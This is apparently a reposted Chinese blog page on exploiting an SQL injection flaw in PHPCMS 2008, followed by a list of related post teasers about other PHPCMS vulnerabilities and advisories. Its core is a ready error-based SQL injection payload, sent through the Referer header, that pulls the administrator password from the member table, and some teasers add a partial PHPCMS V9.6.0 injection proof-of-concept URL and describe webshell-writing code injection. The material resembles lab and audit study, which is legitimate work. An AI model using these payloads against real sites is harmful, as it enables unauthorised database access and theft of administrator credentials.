phpcms2008sql注入漏洞利用

最新推荐文章于 2021-04-14 02:53:58 发布
转载 最新推荐文章于 2021-04-14 02:53:58 发布 · 507 阅读 · 0

本文深入探讨了因模块取referer不严格导致的SQL注入漏洞。通过修改请求头中的referer字段,利用特定payload,演示了如何利用SQL语句查询获取管理员账号密码的过程。

https://blog.youkuaiyun.com/whatiwhere/article/details/84666165
漏洞验证
在漏洞介绍中,我们已经知道,因为模块取referer不严格,过滤不严谨,导致漏洞产生,因此我们这里就可以修改请求头中的referer,在本文中,我们直接使用火狐的插件Tamper 进行修改,或者用burp修改。
payload

referer=1', (SELECT 1 FROM (select count(*), concat(floor(rand(0)*2),char(45,45,45),(SELECT password from phpcms_member limit 1))a from information_schema.tables group by a)b), ‘0')#

这样通过SQL语句查询,就可以获取管理员账号密码。

PHPCMS 2008 远程代码执行漏洞
weixin_43263451的博客
03-22 2064
PHPCMS 2008存在的代码注入漏洞,导致攻击者可向网站上路径可控的文件写入任意内容,从而可能获取webshell并执行任意指令。 漏洞分析与复现 type.php 31行 在17行判断template变量是否为空,如果不为空则值不变,然后在31行调用template函数 我们首先看一下template变量是否为可控的 看到在common.inc.php25行会对参数提前进行全局配置 所以我们可以输入?template=payload 来构造payload 好了,首先明确了变量可控,且没有进行任
2-PHP代码审计——PHPCMSV9.6.0 sql注入漏洞
网络安全
03-31 2522
漏洞环境:PHPCMSV9.6 实验环境的poc: /index.php?m=wap&c=index&siteid=1 userid_flash=b3a3Dv_ICFSxJ_SDlQhbf6cdklSxsLje2RJwBTGknbusMO0 /index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Ccon..
phpcms2008漏洞利用工具
10-13
phpcms2008漏洞利用工具 phpcms2008漏洞利用工具
phpcms2008 yp/prodcut.php 代码执行漏洞 利用工具
09-05
phpcms 2008 yp/product.php 文件pagesize参数没有过滤,导致执行任意php代码,利用前提pagesize>1。
phpcms2008远程代码执行漏洞
xiaoi123的博客
11-29 586
phpcms2008远程代码执行漏洞 描述: 近日,互联网爆出PHPCMS2008代码注入漏洞(CVE-2018-19127)。攻击者利用漏洞,可在未授权的情况下实现对网站文件的写入。该漏洞危害程度为高危(High)。目前,漏洞利用原理已公开,厂商已发布新版本修复此漏洞。 影响范围: PHPCMS2008 sp4及以下版本 POC github地址: https://github.c...
PHPCMS2008 SQL注入漏洞
whatiwhere的博客
11-30 2765
实验环境 实验环境 操作机: Windows XP 目标网址: www.test.ichunqiu 实验目的 掌握本次漏洞的原理及其利用方法 学会如何修复Sql注入漏洞 实验工具 Tamper Data:它是火狐浏览器的一款插件,主要功能如下: 可以用来查看和修改 HTTP/HTTPS 的头部和 POST 参数; 可以用来跟踪 HTTP 请求和响应 可以对 WEB 站点进行某些安全...
PHPCMS2008广告模板SQL注入漏洞修复
10-21
PHPCMS2008是一款流行的开源内容管理系统,然而,如标题所示,它存在一个广告模板SQL注入漏洞,这个问题在2008年的版本中尤为突出。SQL注入是一种常见的网络安全威胁,允许攻击者通过操纵输入数据来执行恶意SQL命令...
PHPCMS V9专题模块注入漏洞的分析与修复方法
09-29
### PHPCMS V9专题模块注入漏洞的分析与修复方法 #### 一、漏洞背景介绍 PHPCMS V9是一款非常流行的开源内容管理系统(Content Management System, CMS),它提供了丰富的功能来帮助用户构建和管理网站。然而,即便...
php cms 代码注入,PHPCMS全版本通杀SQL注入漏洞
weixin_42458282的博客
04-14 1094
漏洞分析首先看下面的代码/phpcms/modules/member/content.php 202行 edit函数[php]public function edit() {$_username = $this->memberinfo['username'];if(isset($_POST['dosubmit'])) {$catid = $_POST['info']['catid'] = i...
php cms2008代码注入,phpcms2008远程代码执行漏洞
weixin_32722049的博客
03-19 334
描述:近日,互联网爆出PHPCMS2008代码注入漏洞(CVE-2018-19127)。攻击者利用漏洞,可在未授权的情况下实现对网站文件的写入。该漏洞危害程度为高危(High)。目前,漏洞利用原理已公开,厂商已发布新版本修复此漏洞。影响范围:PHPCMS2008 sp4及以下版本POC github地址:漏洞分析:在type.php中:包含/include/common.inc.php 其作用是...
php cms2008代码注入,phpcms2008 SQL注入漏洞(漏洞文件/c.php)
weixin_39636102的博客
03-19 244
漏洞文件/c.phprequire'./ads/include/common.inc.php';$id=intval($id);$ads=$c_ads->get_info($id);if($ads){$db->query("UPDATE".DB_PRE."adsSET`clicks`=clicks+1WHEREadsid=".$ads['adsid']);$info...
PHPCMS 2008 最新漏洞(第二季)
收集盒 Book box
04-20 1245
组织 : http://www.safekeyer.com/   (欢迎访问) author: 西毒    blog: http://hi.baidu.com/sethc5      其实还是有蛮多漏洞的,只是我一步步来吧!你们别催,该放的时候自然就会放了. 过程不明显的我就省略了。 在preview.php 中第7行 $r = new_stripslashes($info); 我们
php基于错误的盲注,phpcms 2008广告模块注入漏洞及修复方案
weixin_29807369的博客
04-14 382
简要描述:phpcms 2008 中广告模块,存在参数过滤不严,导致了sql注入漏洞,如果对方服务器开启了错误显示,可直接利用,如果关闭了错误显示,可以采用基于时间和错误的盲注详细说明:js.phpchdir('../ads/');require './ad.php';?>ad.phprequire './include/common.inc.php';$year = date('ym',T...
category.php漏洞,phpcms 2008多个漏洞 (可getshell)
weixin_28712661的博客
03-13 553
一个漏洞不可怕,可怕的是一连串的漏洞,拼接起来就可以getshell了。###文件包含define('IN_YP', TRUE);define('ADMIN_ROOT', str_replace("", '/',dirname(__FILE__)).'/');require '../include/common.inc.php';## 要登陆if(!$_userid) showmessage('您...
phpcms 2008安装以及漏洞
公众号shadow sock7
11-29 1779
参考: https://stackoverflow.com/questions/12428755/1064-error-in-create-table-type-myisam https://www.cnblogs.com/kunspace/p/9760406.html 先在ubuntu-18.04上安装了好几个版本都失败了,于是在windows上使用phpmystudy安装。 修改Mysql配...
phpcms 2008 变量覆盖漏洞
浅笑996的博客
12-26 574
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\ phpcms 2008),点击确定 漏洞分析 1.点击展开/yp/web/include/common.inc.php <?php defined('IN_PHP...
威胁快报|CVE漏洞PHPCMS2008 /type.php代码注入高危漏洞预警(CNVD-C-2018-127157/CVE-2018-19127)...
weixin_34129696的博客
11-28 358
摘要:11月4日,阿里云安全首次捕获PHPCMS 2008版本的/type.php远程GetShell 0day利用攻击,攻击者可以利用漏洞远程植入webshell,导致文件篡改、数据泄漏、服务器被远程控制等一系列严重问题。建议受影响用户尽快升级到最新版本修复。 ———————PHPCMS网站内容管理系统是国内主流CMS系统之一,同时也是一个开源的PH...
phpcms漏洞_「关注」关于PHPCMS 2008存在代码注入漏洞的安全公告
weixin_39520204的博客
12-21 240
印象库伦 今天近日,国家信息安全漏洞共享平台(CNVD)接收到阿里云计算有限公司(阿里云)报告的PHPCMS 2008代码注入漏洞(CNVD-C-2018-127157,对应CVE-2018-19127)。攻击者利用漏洞,可在未授权的情况下实现对网站文件的写入。目前,漏洞利用原理已公开,厂商已发布新版本修复此漏洞。一、漏洞情况分析PHPCMS网站内容管理系统是采用OOP(面向对象)方式自主开发的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值